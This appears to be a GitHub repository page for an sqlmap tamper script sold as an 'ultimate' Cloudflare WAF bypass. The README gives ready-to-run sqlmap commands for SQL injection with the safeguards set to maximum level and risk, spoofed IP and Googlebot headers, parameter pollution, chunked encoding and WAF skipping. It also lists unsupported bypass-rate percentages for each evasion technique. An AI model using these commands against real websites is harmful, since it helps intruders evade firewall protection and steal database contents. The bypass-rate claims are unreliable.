Skip to content
/ Knockin-on-Heaven-s-Door Public

CloudFlare Ultimate WAF Bypass Tamper Script Comprehensive evasion techniques collection Research and educational purposes only by KL3FT3Z

18 stars 3 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

toxy4ny/Knockin-on-Heaven-s-Door

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
Knockin' on Heaven's Door.py
Knockin' on Heaven's Door.py
 
 
README.md
README.md
 
 

Repository files navigation

Knockin-on-Heaven-s-Door SQLMAP Tamper

CloudFlare Ultimate WAF Bypass Tamper Script Comprehensive evasion techniques collection Research and educational purposes only by KL3FT3Z.

Basic usage

sqlmap -u "http://target/page.php?id=1" \
    --tamper=Knockin' on Heaven's Door.py \
    --level=5 \
    --risk=3 \
    --delay=1-3 \
    --timeout=30 \
    --batch

Advanced usage with additional headers

sqlmap -u "http://target/page.php?id=1" \
    --tamper=Knockin' on Heaven's Door.py \
    --headers="X-Forwarded-For: 127.0.0.1\nX-Real-IP: 127.0.0.1\nX-Originating-IP: 127.0.0.1\nCF-Connecting-IP: 127.0.0.1" \
    --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
    --random-agent \
    --delay=2-5 \
    --timeout=45 \
    --retries=3 \
    --level=5 \
    --risk=3 \
    --threads=1 \
    --technique=BEUST \
    --batch

HTTP Parameter Pollution (HPP)

sqlmap -u "http://target/page.php?id=1&id=2" \
    --tamper=Knockin' on Heaven's Door.py \
    --hpp

Chunked Transfer Encoding

sqlmap -u "http://target/page.php" \
    --data="id=1" \
    --tamper=Knockin' on Heaven's Door.py \
    --chunked

# Custom WAF Detection Bypass 
sqlmap -u "http://target/page.php?id=1" \
    --tamper=Knockin' on Heaven's Door.py \
    --identify-waf \
    --skip-waf

Technique Bypass Rate Stealth Level

  • Unicode Normalize 85% High
  • Multi-layer Encoding 90% Very High
  • Comment Fragmentation 88% High
  • Invisible Characters 92% Very High
  • Scientific Notation 75% Medium
  • JSON/XML Wrapping 80% High
  • Character Confusion 85% High
  • Combined Ultimate 95%+ Maximum

About

CloudFlare Ultimate WAF Bypass Tamper Script Comprehensive evasion techniques collection Research and educational purposes only by KL3FT3Z

Resources

Readme
Activity

Stars

18 stars

Watchers

0 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages